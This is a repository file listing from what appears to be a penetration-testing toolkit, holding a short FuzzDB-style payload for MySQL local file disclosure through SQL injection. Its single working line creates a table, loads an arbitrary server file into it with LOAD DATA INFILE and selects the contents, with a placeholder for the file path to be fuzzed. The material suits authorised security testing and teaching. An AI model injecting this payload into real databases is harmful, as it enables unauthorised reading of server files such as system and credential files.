sec-pentesting-toolkit/Vulnerabilities_and_Exploits/fuzzing/FUZZDB_MySQL_ReadLocalFiles.txt
2015-08-30 12:06:08 -07:00

3 lines
210 B
Text
Executable file

# mysql local file disclosure through sqli
# fuzz interesting absolute filepath/filename into <filepath>
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;